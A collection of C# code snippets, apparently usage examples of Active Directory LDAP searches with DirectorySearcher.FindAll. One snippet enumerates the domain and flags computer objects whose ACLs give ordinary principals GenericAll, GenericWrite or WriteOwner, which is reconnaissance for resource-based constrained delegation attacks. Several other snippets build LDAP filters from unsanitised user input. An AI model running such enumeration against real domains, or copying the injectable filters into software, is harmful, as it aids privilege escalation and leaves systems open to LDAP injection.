private DataTable RunLDAPQuery(string query, string column) { DirectorySearcher ds = new DirectorySearcher(); string sFilter2 = query; ds.Filter = sFilter2; SearchResultCollection src2 = ds.FindAll(); DataTable dt = new DataTable("ADGroups"); dt.Columns.Add(column, typeof(string)); foreach (SearchResult s2 in src2) { ResultPropertyCollection rpc2 = s2.Properties; if (rpc2[column].Count > 0) { for (int icount = 0; icount < rpc2[column].Count; icount++) { DataRow dr = dt.NewRow(); dr[column] = rpc2[column][icount]; dt.Rows.Add(dr); } } else { DataRow dr = dt.NewRow(); dr[column] = rpc2[column]; dt.Rows.Add(dr); } } return dt; }
int UserId; // For User Id #endregion Fields #region Methods /// <summary> /// To bind active directory records in user details grid /// </summary> public void BindUser() { DataTable DtBindUser = new DataTable(); DataColumn Dtmail = new DataColumn("mail"); DataColumn Dtfname = new DataColumn("fname"); DataColumn Dtlname = new DataColumn("lname"); DataColumn DtdisplayName = new DataColumn("displayName"); DtBindUser.Columns.Add(Dtmail); DtBindUser.Columns.Add(Dtfname); DtBindUser.Columns.Add(Dtlname); DtBindUser.Columns.Add(DtdisplayName); DataRow Druser; // Added connection string for active directory user string connection = ConfigurationManager.ConnectionStrings["ADConnection"].ToString(); DirectorySearcher DsSearch = new DirectorySearcher(connection); // declaired domain from which you want to fetch active directory users DirectoryEntry UserDomain = new DirectoryEntry("LDAP://DC=kpmg,DC=aptaracorp,DC=com"); DirectorySearcher Usersearch = new DirectorySearcher(connection); DsSearch.SearchRoot = UserDomain; DsSearch.SearchScope = SearchScope.Subtree; SearchResultCollection UserResult; //Applied Filter On User For Specific Fname and Lname Usersearch.Filter = "(&(objectClass=user)(sn=" + txtLastName.Text + "*)(givenName=" + txtFName.Text + "*))"; UserResult = Usersearch.FindAll(); for (int i = 0; i < UserResult.Count; i++) { string AccounName = UserResult[i].Properties["samaccountname"][0].ToString(); DirectorySearcher DrSearcher = new System.DirectoryServices.DirectorySearcher("(samaccountname=" + AccounName + ")"); SearchResult SrchRes = DrSearcher.FindOne(); DirectoryEntry DrEntry = SrchRes.GetDirectoryEntry(); try { if (DrEntry.Properties["givenName"][0].ToString() != "") { string FirstName = DrEntry.Properties["givenName"][0].ToString(); string LastName = DrEntry.Properties["sn"][0].ToString(); string UserEmail = DrEntry.Properties["mail"][0].ToString(); string UserDisName = DrEntry.Properties["displayName"][0].ToString(); Druser = DtBindUser.NewRow(); Druser["mail"] = UserEmail.ToString(); Druser["fname"] = FirstName.ToString(); Druser["lname"] = LastName.ToString(); Druser["displayName"] = UserDisName.ToString(); DtBindUser.Rows.Add(Druser); } } catch { ////throw; } } if (DtBindUser.Rows.Count > 0) { grdUserDetails.DataSource = DtBindUser; grdUserDetails.DataBind(); } }
public static IEnumerable<SearchResult> SafeFindAll(DirectorySearcher searcher) { using (SearchResultCollection results = searcher.FindAll()) { foreach (SearchResult result in results) { yield return result; } // SearchResultCollection will be disposed here } }
//LDAP验证 public bool VerifyUser(DirectorySearcher searcher) { try { //执行以下方法时没抛出异常说明用户名密码正确 SearchResultCollection rs = searcher.FindAll(); return true; } catch (Exception e) { return false; } }
public bool UserExists(string username) { DirectoryEntry de = GetDirectoryEntry(); de.Username = "******"; de.Password = "******"; //de.Username = "******"; //de.Password = "******"; DirectorySearcher deSearch = new DirectorySearcher(); deSearch.SearchRoot = de; deSearch.Filter = "(&(objectClass=user) (|(samaccountname=" + username + ")(cn=" + username + ")))"; SearchResultCollection results = deSearch.FindAll(); return results.Count > 0; }
public override void CreateNewOutputRows() { DirectorySearcher ADLookup = new DirectorySearcher(); ADLookup.Filter = "(cn=IS BI Foundation Team)"; ADLookup.PropertiesToLoad.Add("member"); ADLookup.PropertiesToLoad.Add("cn"); SearchResultCollection group = ADLookup.FindAll(); foreach (SearchResult member in group) { foreach (Object memberObj in member.Properties["cn"]) { DirectoryEntry user = new DirectoryEntry(memberObj); System.DirectoryServices.PropertyCollection userProps = user.Properties; Output0Buffer.AddRow(); Output0Buffer.User = userProps["SAMAccountName"].Value.ToString(); } } /* if (result != null) { for (int i = 0; i < result.Properties["member"].Count; i++) { DirectorySearcher ADUserLookup = new DirectorySearcher(); ADUserLookup.Filter = (String)result.Properties["member"][i]; ADUserLookup.PropertiesToLoad.Add("cn"); SearchResult user = ADUserLookup.FindOne(); if (user != null) { Output0Buffer.AddRow(); Output0Buffer.User = (String)user.Properties["cn"][0]; } } }*/ }
public void TestSearch() { using (DirectoryEntry de = CreateRootEntry()) { DeleteOU(de, "SearchRoot"); try { using (DirectoryEntry rootOU = CreateOU(de, "SearchRoot", "Root OU")) using (DirectoryEntry childOU = CreateOU(rootOU, "Search.Child1", "Root Child 1 OU")) using (DirectoryEntry anotherChildOU = CreateOU(rootOU, "Search.Child2", "Root Child 2 OU")) using (DirectoryEntry grandChildOU = CreateOU(childOU, "Search.GrandChild", "Grand Child OU")) using (DirectoryEntry user1 = CreateOrganizationalRole(grandChildOU, "user.search.grandChild.1", "Grand Child User", "1 111 111 1111")) using (DirectoryEntry user2 = CreateOrganizationalRole(grandChildOU, "user.search.grandChild.2", "Grand Child User", "1 222 222 2222")) { user1.Properties["postalCode"].Value = 98052; user1.Properties["postalAddress"].Value = "12345 SE 1st Street, City1, State1"; user1.CommitChanges(); user2.Properties["postalCode"].Value = 98088; user2.Properties["postalAddress"].Value = "67890 SE 2nd Street, City2, State2"; user2.CommitChanges(); using (DirectorySearcher ds = new DirectorySearcher(rootOU)) { ds.ClientTimeout = new TimeSpan(0, 2, 0); ds.Filter = "(objectClass=organizationalUnit)"; Assert.Equal(4, ds.FindAll().Count); ds.Filter = "(objectClass=organizationalRole)"; Assert.Equal(2, ds.FindAll().Count); ds.Filter = "(ou=SearchRoot)"; Assert.Equal(1, ds.FindAll().Count); ds.Filter = "(ou=Search.Child1)"; Assert.Equal(1, ds.FindAll().Count); ds.Filter = "(ou=Search.Child2)"; Assert.Equal(1, ds.FindAll().Count); ds.Filter = "(ou=Search.GrandChild)"; Assert.Equal(1, ds.FindAll().Count); ds.Filter = "(description=Grand Child OU)"; Assert.Equal(1, ds.FindAll().Count); ds.Filter = "(description=*)"; Assert.Equal(6, ds.FindAll().Count); ds.Filter = "(&(description=*)(objectClass=organizationalUnit))"; Assert.Equal(4, ds.FindAll().Count); ds.Filter = "(&(description=*)(objectClass=organizationalRole))"; Assert.Equal(2, ds.FindAll().Count); ds.Filter = "(&(description=No Description)(objectClass=organizationalRole))"; Assert.Equal(0, ds.FindAll().Count); ds.Filter = "(postalCode=*)"; Assert.Equal(2, ds.FindAll().Count); ds.Filter = "(postalCode=98052)"; Assert.Equal(1, ds.FindAll().Count); SearchResult sr = ds.FindOne(); Assert.Equal("98052", sr.Properties["postalCode"][0]); ds.Filter = "(postalCode=98088)"; Assert.Equal(1, ds.FindAll().Count); sr = ds.FindOne(); Assert.Equal("98088", sr.Properties["postalCode"][0]); } } } finally { DeleteOU(de, "SearchRoot"); } } }
private List <ADInfoModel> SearchTask(object obj) { object[] arr = obj as object[]; string searchPath = arr[0] as string; List <string> noSchemaClassName = arr[1] as List <string>; List <string> noName = arr[2] as List <string>; List <string> propertiesToLoad = arr[3] as List <string>; string filter = arr[4] as string; SearchScope searchScope = (SearchScope)arr[5]; List <ADInfoModel> list = null; try { string path = searchPath; if (string.IsNullOrEmpty(path)) { path = string.Format("LDAP://{0}", this.Domain); } string domainaccount = string.Format("{0}\\{1}", this.Domain, this.Account); using (DirectoryEntry entry = new DirectoryEntry(path, domainaccount, this.Password)) { using (DirectorySearcher search = new DirectorySearcher(entry)) { search.SearchScope = searchScope; search.Asynchronous = true; search.SizeLimit = int.MaxValue; if (!string.IsNullOrEmpty(filter)) { search.Filter = filter; } if (propertiesToLoad != null && propertiesToLoad.Count > 0) { if (!propertiesToLoad.Contains("name", StringComparer.OrdinalIgnoreCase)) { propertiesToLoad.Add("name"); } if (!propertiesToLoad.Contains("objectclass", StringComparer.OrdinalIgnoreCase)) { propertiesToLoad.Add("objectclass"); } if (!propertiesToLoad.Contains("objectguid", StringComparer.OrdinalIgnoreCase)) { propertiesToLoad.Add("objectguid"); } if (!propertiesToLoad.Contains("adspath", StringComparer.OrdinalIgnoreCase)) { propertiesToLoad.Add("adspath"); } search.PropertiesToLoad.AddRange(propertiesToLoad.ToArray()); } using (var all = search.FindAll()) { list = new List <ADInfoModel>(all.Count); foreach (SearchResult searchResult in all) { var info = Get(searchResult); if (info != null) { if ((noSchemaClassName == null || !noSchemaClassName.Contains(info.SchemaClassName, StringComparer.OrdinalIgnoreCase)) && (noName == null || !noName.Contains(info.Name, StringComparer.OrdinalIgnoreCase))) { list.Add(info); } } } } } } } catch (Exception ex) { this.OnErrorCall(ex); } return(list); }
private static void EnumerateGroups(DomainInformation root, DirectoryEntry directory) { foreach (DirectoryEntry child in directory.Children) { if (child.SchemaClassName == "organizationalUnit" || child.SchemaClassName == "container" || child.SchemaClassName == "group") { DirectorySearcher mySearcher = new DirectorySearcher(child) { Filter = "(objectClass=group)" }; if (mySearcher.FindAll().Count != 0 || child.SchemaClassName == "group") { switch (child.SchemaClassName) { case "organizationalUnit": { var item = new DomainInformation() { Type = DomainInformationTypeEnum.OrganizationUnit, Name = child.Name.Replace("OU=", ""), Description = child.Properties["description"].Value != null ? child.Properties["description"].Value.ToString() : string.Empty }; if (root.Childrens.Where(x => x.Name == item.Name && x.Description == item.Description).Count() == 0) { root.Childrens.Add(item); EnumerateGroups(item, child); } break; } case "container": { var item = new DomainInformation() { Type = DomainInformationTypeEnum.OrganizationUnit, Name = child.Name.Replace("CN=", ""), Description = child.Properties["description"].Value != null ? child.Properties["description"].Value.ToString() : string.Empty }; if (root.Childrens.Where(x => x.Name == item.Name && x.Description == item.Description).Count() == 0) { root.Childrens.Add(item); EnumerateGroups(item, child); } break; } case "group": { var item = new DomainInformation() { Type = DomainInformationTypeEnum.Group, Name = child.Name.Replace("CN=", ""), Description = child.Properties["description"].Value != null ? child.Properties["description"].Value.ToString() : string.Empty, Info = ParseGroupInfo(child) }; if (root.Childrens.Where(x => x.Name == item.Name && x.Description == item.Description).Count() == 0) { if (child.Properties["member"] != null) { foreach (var member in child.Properties["member"]) { (item.Info as ActiveDirectoryGroupInfo).Members.Add(member.ToString().Split(',')[0].Replace("CN=", "")); } } root.Childrens.Add(item); } break; } } } else { continue; } } else { continue; } } }
private void SyncComputers() { Logger.Debug("Synchronizing Computers From Active Directory"); var allCompDict = new Dictionary <string, string>(); //Get All ad enabled computer excluding servers var enabledCompDict = new Dictionary <string, string>(); using (DirectoryEntry entry = InitializeEntry()) { using (DirectorySearcher searcher = new DirectorySearcher(entry)) { searcher.Filter = "(&(objectCategory=Computer)(!userAccountControl:1.2.840.113556.1.4.803:=2)(!operatingSystem=*server*))"; searcher.PropertiesToLoad.Add("cn"); searcher.PropertiesToLoad.Add("distinguishedName"); searcher.SizeLimit = 0; searcher.PageSize = 500; foreach (SearchResult res in searcher.FindAll()) { enabledCompDict.Add((string)res.Properties["distinguishedName"][0], ((string)res.Properties["cn"][0]).ToUpper()); } } } //Get All ad disabled computer excluding servers var disabledCompDict = new Dictionary <string, string>(); using (DirectoryEntry entry = InitializeEntry()) { using (DirectorySearcher searcher = new DirectorySearcher(entry)) { searcher.Filter = "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=2)(!operatingSystem=*server*))"; searcher.PropertiesToLoad.Add("cn"); searcher.PropertiesToLoad.Add("distinguishedName"); searcher.SizeLimit = 0; searcher.PageSize = 500; foreach (SearchResult res in searcher.FindAll()) { disabledCompDict.Add((string)res.Properties["distinguishedName"][0], ((string)res.Properties["cn"][0]).ToUpper()); } } } disabledCompDict.ToList().ForEach(x => allCompDict[x.Key] = x.Value); enabledCompDict.ToList().ForEach(x => allCompDict[x.Key] = x.Value); if (allCompDict.Count > 0) { var currentAdComputers = _computerService.GetAllAdComputers(); var toArchive = (from adComputer in currentAdComputers let doesExist = allCompDict.FirstOrDefault(x => x.Value == adComputer.Name) where doesExist.Value == null select adComputer.Id).ToList(); foreach (var compId in toArchive) { _computerService.ArchiveComputer(compId); } } foreach (var comp in enabledCompDict) { var existing = _computerService.GetByName(comp.Value); if (existing == null) { var computerEntity = new EntityComputer(); computerEntity.Name = comp.Value; computerEntity.IsAdSync = true; computerEntity.AdDisabled = false; computerEntity.ProvisionStatus = EnumProvisionStatus.Status.PreProvisioned; computerEntity.CertificateId = -1; var addResult = _computerService.AddComputer(computerEntity); if (addResult == null) { continue; } if (addResult.Success) { CreateMembershipList(computerEntity, comp.Key); } } else { if (!existing.IsAdSync) { existing.IsAdSync = true; existing.AdDisabled = false; _computerService.UpdateComputer(existing); } else if (existing.IsAdSync && existing.AdDisabled) { existing.AdDisabled = false; _computerService.UpdateComputer(existing); } CreateMembershipList(existing, comp.Key); } } foreach (var comp in disabledCompDict) { var existing = _computerService.GetByName(comp.Value); if (existing == null) { var computerEntity = new EntityComputer(); computerEntity.Name = comp.Value; computerEntity.IsAdSync = true; computerEntity.AdDisabled = true; computerEntity.ProvisionStatus = EnumProvisionStatus.Status.PreProvisioned; computerEntity.CertificateId = -1; var addResult = _computerService.AddComputer(computerEntity); if (addResult == null) { continue; } if (addResult.Success) { CreateMembershipList(computerEntity, comp.Key); } } else { if (!existing.IsAdSync) { existing.IsAdSync = true; existing.AdDisabled = true; _computerService.UpdateComputer(existing); } else if (existing.IsAdSync && !existing.AdDisabled) { existing.AdDisabled = true; _computerService.UpdateComputer(existing); } CreateMembershipList(existing, comp.Key); } } }
protected void btnImport_Click(object sender, EventArgs e) { try { string varObjDomainName; string Username = ""; string Password = ""; Username = txtUserName.Text; Password = txtPassword.Text; // Assign domain name to variable varDomainName and varObjDomainName varObjDomainName = txtDomainName.Text.ToString().Trim(); // Create object de of Directory Entry Class DirectoryEntry myDirectoryEntry = new DirectoryEntry(String.Format("LDAP://{0}", varObjDomainName)); myDirectoryEntry.Username = Username; myDirectoryEntry.Password = Password; // DirectoryEntry myDirectoryEntry = new DirectoryEntry(String.Format("LDAP://{0}/ou=Sur;ou=apc;dc=Terex;dc=local",varObjDomainName)); // Create object mySearcher of DirectorySearcher Class DirectorySearcher mySearcher = new DirectorySearcher(myDirectoryEntry); // mySearcher.SearchScope = SearchScope.Subtree; mySearcher.Filter = "(&(objectClass=user)(objectCategory=person))"; // mySearcher.Filter = "(objectClass=group)"; // Create Local Variable OrganizationId to get organization id int OrganizationId; // Call Function Get_Organization() to get the object of Organization_mst objOrg = objOrg.Get_Organization(); // Assign Organization id to variable OrganizationId OrganizationId = objOrg.Orgid; // Create Localvariable varRoleName get role form Gloabl Resource File MessageResource and later assign to user when user import to database string varRoleName = Resources.MessageResource.BasicUserRole.ToString(); // Assign roleid to local variable varRoleid by calling function Get_By_RoleName int varRoleid = objRoleInfo.Get_By_RoleName(varRoleName); // Create Local Variable FlagSave and FlagUserExist to check status of save and user Exist int FlagSave = 0; int FlagUserExist = 0; foreach (SearchResult result in mySearcher.FindAll()) { try { //if (!String.IsNullOrEmpty(result.Properties["Mail"][0].ToString()) // && System.Text.RegularExpressions.Regex.IsMatch(result.Properties["DisplayName"][0].ToString(), " |admin|test|service|system|[$]", System.Text.RegularExpressions.RegexOptions.IgnoreCase) ) //{ string SAMAccountName = Convert.ToBoolean(result.Properties["sAMAccountName"].Count > 0) ? result.Properties["sAMAccountName"][0].ToString() : ""; string DisplayName = Convert.ToBoolean(result.Properties["displayName"].Count > 0) ? result.Properties["displayName"][0].ToString() : ""; string mail = Convert.ToBoolean(result.Properties["mail"].Count > 0) ? result.Properties["mail"][0].ToString() : ""; string company = Convert.ToBoolean(result.Properties["company"].Count > 0) ? result.Properties["company"][0].ToString() : ""; // Create loccal variable FlagStatus,varUsername int FlagStatus; string varUserName; // Assign username to variable varUserName varUserName = SAMAccountName.ToString().Trim(); // Declare local Variable Flag to Check Status User Exist in databse FlagStatus = objUserLogin.Get_By_UserName(varUserName, OrganizationId); // If variable FlagStatus is zero then User does not exist in database if (FlagStatus == 0) { // Create local variable FlagInsertStatus to check insert status of function int FlagInsertStatus; // Create local variable VarPassword to get passowrd which is generated using function GeneratePassword() string VarPassword = Membership.GeneratePassword(8, 2); objUserLogin.ADEnable = true; objUserLogin.Createdatetime = DateTime.Now.ToString(); objUserLogin.Enable = true; objUserLogin.Orgid = OrganizationId; objUserLogin.Password = VarPassword; objUserLogin.Username = varUserName; objUserLogin.Roleid = varRoleid; objUserLogin.DomainName = varObjDomainName; // Call function objUserLogin.Insert to insert user data to UserLogin_mst table and assign status in FlagInsertStatus variable FlagInsertStatus = objUserLogin.Insert(); // If FlagInsertStatus is 1 then Insert operation is Success if (FlagInsertStatus == 1) { // Create local variable UserId,varFirstName,varLastName,varFullname,arraycount,FlagContactInfo int UserId; string varFirstName = ""; string varLastName = ""; string[] varFullName; int arraycount; int FlagContactInfo; // Assign Display Name to variable varFullname to get firstname and last name by calling split function varFullName = DisplayName.Split(' '); //Assign the number of variables in array varFullName to arraycount ,to check how many elements in varFullName array arraycount = varFullName.Count(); varFirstName = varFullName[0].ToString().Trim(); // if arraycount is greater than one,than there is more than one values in array varFullName ie it also contain lastname value if (arraycount > 1) { // lastname assign to variable varLastName varLastName = varFullName[1].ToString().Trim(); } // Fetch userid of Newly created user and assign to local variable userid by calling function objUserLogin.Get_By_UserName UserId = objUserLogin.Get_By_UserName(varUserName.ToString().Trim(), OrganizationId); objContactInfo.Userid = UserId; // objContactInfo.Deptname = department; objContactInfo.Emailid = mail; objContactInfo.Firstname = varFirstName; objContactInfo.Lastname = varLastName; // Local variable FlagContactInfo contain the status of Insert function objContactInfo.Insert() FlagContactInfo = objContactInfo.Insert(); // if FlagContactInfo is zero,means error occured and delete the user record by calling objUserLogin.Delete function if (FlagContactInfo == 0) { objUserLogin.Delete(UserId); } else { // Assign variable FlagSave =1 to show record added successfully in database FlagSave = 1; string varEmail; if (mail == "") { varEmail = Resources.MessageResource.errMemshipCreateUserEmail.ToString(); } else { varEmail = mail.ToString().Trim(); } // Create Mstatus field to send in Membership.CreateUser function as Out Variable for creating Membership User database MembershipCreateStatus Mstatus = default(MembershipCreateStatus); // Call Membership.CreateUser function to create Membership user Membership.CreateUser(varUserName.ToString().Trim(), VarPassword.ToString().Trim(), varEmail, "Project Name", "Helpdesk", true, out Mstatus); // Call Roles.AddUserToRole Function to Add User To Role Roles.AddUserToRole(varUserName.ToString().Trim(), varRoleName); } } } else { FlagUserExist = 1; } } //} catch { } } if (FlagSave == 1) { // Show Messages from Resources.MessageResource resouces file located in App_GlobalResource Dir lblErrMsg.Text = Resources.MessageResource.errDataSave.ToString(); } else { if (FlagUserExist == 1) { lblErrMsg.Text = Resources.MessageResource.errUserDomainExist.ToString(); } else { lblErrMsg.Text = Resources.MessageResource.errOccured.ToString(); } } } catch (Exception ex) { // Show Messages from Resources.MessageResource resouces file located in App_GlobalResource Dir lblErrMsg.Text = Resources.MessageResource.errDomainName.ToString(); } Dispose(); }
public List <ADUser> ReadUsers() { List <ADUser> users = new List <ADUser>(); using (DirectoryEntry startingPoint = new DirectoryEntry(Properties.Settings.Default.ADUrl)) { using (DirectorySearcher searcher = new DirectorySearcher(startingPoint)) { searcher.PageSize = 500; searcher.Filter = "(&(objectClass=user)(objectCategory=person)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))"; searcher.PropertiesToLoad.Add(Properties.Settings.Default.UserTitleField); searcher.PropertiesToLoad.Add("objectGUID"); searcher.PropertiesToLoad.Add(Properties.Settings.Default.UserNameField); searcher.PropertiesToLoad.Add("distinguishedname"); searcher.PropertiesToLoad.Add("sAMAccountName"); if (!string.IsNullOrEmpty(Properties.Settings.Default.CustomUUIDField)) { searcher.PropertiesToLoad.Add(Properties.Settings.Default.CustomUUIDField); } if (!string.IsNullOrEmpty(Properties.Settings.Default.UserEmailField)) { searcher.PropertiesToLoad.Add(Properties.Settings.Default.UserEmailField); } if (!string.IsNullOrEmpty(Properties.Settings.Default.UserCprField)) { searcher.PropertiesToLoad.Add(Properties.Settings.Default.UserCprField); } using (var resultSet = searcher.FindAll()) { foreach (SearchResult res in resultSet) { string uuid = null; if (!string.IsNullOrEmpty(Properties.Settings.Default.CustomUUIDField)) { if (res.Properties.Contains(Properties.Settings.Default.CustomUUIDField)) { uuid = (string)res.Properties[Properties.Settings.Default.CustomUUIDField][0]; } } else { Guid guid = new Guid((byte[])res.Properties["objectGUID"][0]); uuid = guid.ToString().ToLower(); } string dn = (string)res.Properties["distinguishedname"][0]; string name = (string)res.Properties[Properties.Settings.Default.UserNameField][0]; string userId = (string)res.Properties["sAMAccountName"][0]; string title = Properties.Settings.Default.DefaultTitle; if (res.Properties.Contains(Properties.Settings.Default.UserTitleField)) { title = (string)res.Properties[Properties.Settings.Default.UserTitleField][0]; } string email = null; if (res.Properties.Contains(Properties.Settings.Default.UserEmailField)) { email = (string)res.Properties[Properties.Settings.Default.UserEmailField][0]; } string cpr = null; if (res.Properties.Contains(Properties.Settings.Default.UserCprField)) { cpr = (string)res.Properties[Properties.Settings.Default.UserCprField][0]; cpr = cpr.Replace("-", ""); if (cpr.Length != 10) { cpr = null; } } if (string.IsNullOrEmpty(uuid)) { log.Warn("User " + userId + " did not have a uuid in attribute '" + Properties.Settings.Default.CustomUUIDField + "'"); continue; } try { new Guid(uuid); } catch (Exception) { log.Warn("User " + userId + " did not have a uuid in attribute '" + Properties.Settings.Default.CustomUUIDField + "'. Invalid value: " + uuid); continue; } bool skip = false; if (!string.IsNullOrEmpty(SAMAccountPrefix)) { if (!userId.StartsWith(SAMAccountPrefix)) { skip = true; } } foreach (string ouToIgnore in ousToIgnore) { if (ouToIgnore.Trim().Length == 0) { continue; } if (dn.ToLower().EndsWith(ouToIgnore.ToLower())) { skip = true; } } if (skip) { continue; } ADUser user = new ADUser(); user.Dn = dn; user.Title = title; user.Name = name; user.Uuid = uuid.ToString().ToLower(); user.UserId = userId; user.Cpr = cpr; user.Email = email; users.Add(user); } } } } return(users); }
static void Main(string[] args) { var stopWatch = Stopwatch.StartNew(); string currentDomain = null; try { currentDomain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain().ToString(); Console.WriteLine("This is the current domain: " + currentDomain); } catch { Console.WriteLine("Unable to get domain from current user context. Please specify domain to user"); } // Get user domain information if (currentDomain != null) { string searchBase = "LDAP://DC=" + currentDomain.Replace(".", ",DC="); //Start searching for all AD users? DirectoryEntry adEntry = new DirectoryEntry(searchBase); DirectorySearcher userSearch = new DirectorySearcher(adEntry); userSearch.Filter = "(&(samAccountType=805306368))"; userSearch.PropertiesToLoad.Add("objectsid"); userSearch.PropertiesToLoad.Add("samaccountname"); userSearch.PageSize = int.MaxValue; userSearch.SizeLimit = int.MaxValue; Console.WriteLine("Searching for all users..."); SearchResultCollection userResults = null; SearchResult result; userResults = userSearch.FindAll(); var allSids = new List <string>(); Dictionary <string, string> sidMapping = new Dictionary <string, string>(); if (userResults != null) { Console.WriteLine("There are this many users: " + userResults.Count); for (int counter = 0; counter < userResults.Count; counter++) { result = userResults[counter]; var usrId = (byte[])result.Properties["objectsid"][0]; var objectID = (new SecurityIdentifier(usrId, 0)).ToString(); allSids.Add(objectID.ToString()); sidMapping.Add(objectID.ToString(), result.Properties["samaccountname"][0].ToString()); } } // Search for all AD groups DirectorySearcher groupSearch = new DirectorySearcher(adEntry); groupSearch.Filter = "(&(objectCategory=group))"; groupSearch.PropertiesToLoad.Add("objectsid"); groupSearch.PropertiesToLoad.Add("samaccountname"); groupSearch.PageSize = int.MaxValue; groupSearch.SizeLimit = int.MaxValue; Console.WriteLine("Searching for all groups..."); SearchResultCollection groupResults = null; SearchResult groupResult; groupResults = groupSearch.FindAll(); if (groupResults != null) { Console.WriteLine("There are this many groups: " + groupResults.Count); for (int counter = 0; counter < groupResults.Count; counter++) { groupResult = groupResults[counter]; // Filter out groups that have privileges over objects like Domain Admins if (!(groupResult.Properties["samaccountname"][0].ToString().Equals("Domain Admins") || groupResult.Properties["samaccountname"][0].ToString().Equals("Account Operators") || groupResult.Properties["samaccountname"][0].ToString().Equals("Enterprise Admins") || groupResult.Properties["samaccountname"][0].ToString().Equals("Administrators") || groupResult.Properties["samaccountname"][0].ToString().Equals("DnsAdmins") || groupResult.Properties["samaccountname"][0].ToString().Equals("Schema Admins") || groupResult.Properties["samaccountname"][0].ToString().Equals("Key Admins") || groupResult.Properties["samaccountname"][0].ToString().Equals("Enterprise Key Admins") || groupResult.Properties["samaccountname"][0].ToString().Equals("Storage Replica Administrators"))) { var groupId = (byte[])groupResult.Properties["objectsid"][0]; var objectID = (new SecurityIdentifier(groupId, 0)).ToString(); allSids.Add(objectID.ToString()); sidMapping.Add(objectID.ToString(), groupResult.Properties["samaccountname"][0].ToString()); } } } // Search for all AD Computer SIDs // Search for all computer acls? Console.WriteLine("Searching for all computers..."); DirectorySearcher aclSearch = new DirectorySearcher(adEntry); aclSearch.Filter = "(&(samAccountType=805306369))"; var Properties = new[] { "samaccountname", "ntsecuritydescriptor", "objectsid", "dnshostname" }; aclSearch.PropertiesToLoad.AddRange(Properties); aclSearch.SecurityMasks = SecurityMasks.Dacl | SecurityMasks.Owner; aclSearch.SizeLimit = int.MaxValue; aclSearch.PageSize = int.MaxValue; SearchResultCollection aclResults = aclSearch.FindAll(); // Include the computer SIDs in allSids for (int counter = 0; counter < aclResults.Count; counter++) { result = aclResults[counter]; var aclId = (byte[])result.Properties["objectsid"][0]; var objectID = (new SecurityIdentifier(aclId, 0)).ToString(); allSids.Add(objectID.ToString()); sidMapping.Add(objectID.ToString(), result.Properties["samaccountname"][0].ToString()); } Console.WriteLine("There are this many computers: " + aclResults.Count); List <SearchResult> resultList = new List <SearchResult>(); foreach (SearchResult acl in aclResults) { resultList.Add(acl); } List <rbcd> rbcdList = new List <rbcd>(); Parallel.ForEach(resultList, (SearchResult aclResult) => { var Object = aclResult.Properties; var computerId = (byte[])aclResult.Properties["objectsid"][0]; var computerSid = (new SecurityIdentifier(computerId, 0)).ToString(); ActiveDirectorySecurity adsd = new ActiveDirectorySecurity(); adsd.SetSecurityDescriptorBinaryForm(Object["ntSecurityDescriptor"][0] as byte[]); AuthorizationRuleCollection arc = adsd.GetAccessRules(true, false, typeof(System.Security.Principal.SecurityIdentifier)); foreach (ActiveDirectoryAccessRule adRule in arc) { string sid = null; sid = adRule.IdentityReference.ToString(); string hostname = null; try { hostname = Object["dnshostname"][0].ToString(); } catch { continue; } if (hostname == null) { hostname = Object["samaccountname"][0].ToString(); } if (adRule.ActiveDirectoryRights == ActiveDirectoryRights.GenericAll) { if (allSids.Contains(sid) && sid != computerSid) { rbcdList.Add(new rbcd(sidMapping[sid], hostname, "GenericAll")); } } else if (adRule.ActiveDirectoryRights.ToString().Contains("GenericWrite")) { if (allSids.Contains(sid) && sid != computerSid) { rbcdList.Add(new rbcd(sidMapping[sid], hostname, "GenericWrite")); } } else if (adRule.ActiveDirectoryRights.ToString().Contains("WriteOwner")) { if (allSids.Contains(sid) && sid != computerSid) { rbcdList.Add(new rbcd(sidMapping[sid], hostname, "WriteOwner")); } } } }); Console.WriteLine("Execution time = {0} seconds", stopWatch.Elapsed.TotalSeconds); Console.WriteLine("Number of possible RBCD ACLs: " + rbcdList.Count); foreach (rbcd oneRbcd in rbcdList) { Console.WriteLine("RBCD ACL:\nSource: " + oneRbcd.Source + "\nDestination: " + oneRbcd.Destination + "\nPrivilege: " + oneRbcd.Privilege + "\n"); } } }
public List<UserProxyPrincipal> GetChildUserProxyObjects(int maxRecords) { var directoryDe = new DirectoryEntry(); if (ContextType == ContextType.ApplicationDirectory) { if (!string.IsNullOrEmpty(Container) && !string.IsNullOrEmpty(Name)) { directoryDe = new DirectoryEntry(string.Format("LDAP://{0}/{1}", Name, Container)); } else { directoryDe = new DirectoryEntry(string.Format("LDAP://{0}", Name)); } } if (ContextType == ContextType.Machine || ContextType == ContextType.Domain) { throw new NotSupportedException( "This functionality is only available for ApplicationDirectory ContextType PrincipalContext objects."); } var search = new DirectorySearcher(directoryDe) { Tombstone = false, Asynchronous = true, PageSize = 100, Filter = "(objectClass=userProxy)" }; var results = search.FindAll(); var i = 0; var children = new List<UserProxyPrincipal>(); foreach (SearchResult result in results) { i++; var delims = new[] {'/'}; var pieces = result.Path.Split(delims); var dn = pieces[pieces.Count() - 1]; if (maxRecords > 0 && i > maxRecords) { break; } try { children.Add(UserProxyPrincipal.FindByIdentity(this, IdentityType.DistinguishedName, dn)); } catch { } } return children; }
/// <summary> /// 搜索部门AD /// </summary> /// <param name="path"></param> /// <param name="objFilter"></param> /// <param name="dicPropertes"></param> /// <returns></returns> public List <ADDepartment> SearchDepartment(string path, string objFilter, Dictionary <string, string> dicPropertes, string pathAnalyseClass) { List <ADDepartment> depList = new List <ADDepartment>(); string[] arrPropertes = dicPropertes.Keys.ToArray(); try { path = "LDAP://" + (String.IsNullOrEmpty(this.Domain) == false ? this.Domain : "") + path; DirectoryEntry root = null; if (authorizeType == AuthorizeType.anonymous) { root = new DirectoryEntry(path, "", "", AuthenticationTypes.Anonymous); } else if (authorizeType == AuthorizeType.none) { root = new DirectoryEntry(path, this.UserName, this.PassWord, AuthenticationTypes.None); } if (root != null) { Console.WriteLine("开始遍历AD部门" + root.Path); using (DirectorySearcher searcher = new DirectorySearcher()) { searcher.SearchRoot = root; searcher.SearchScope = SearchScope.Subtree; searcher.Filter = objFilter; searcher.PropertiesToLoad.AddRange(arrPropertes); SearchResultCollection results = searcher.FindAll(); StringBuilder summary = new StringBuilder(); foreach (SearchResult result in results) { ADDepartment dep = new ADDepartment(); foreach (string propName in result.Properties.PropertyNames) { if (dicPropertes[propName] != null) { dep.SetDynamicProperty(dicPropertes[propName].ToString(), result.Properties[propName][0].ToString()); 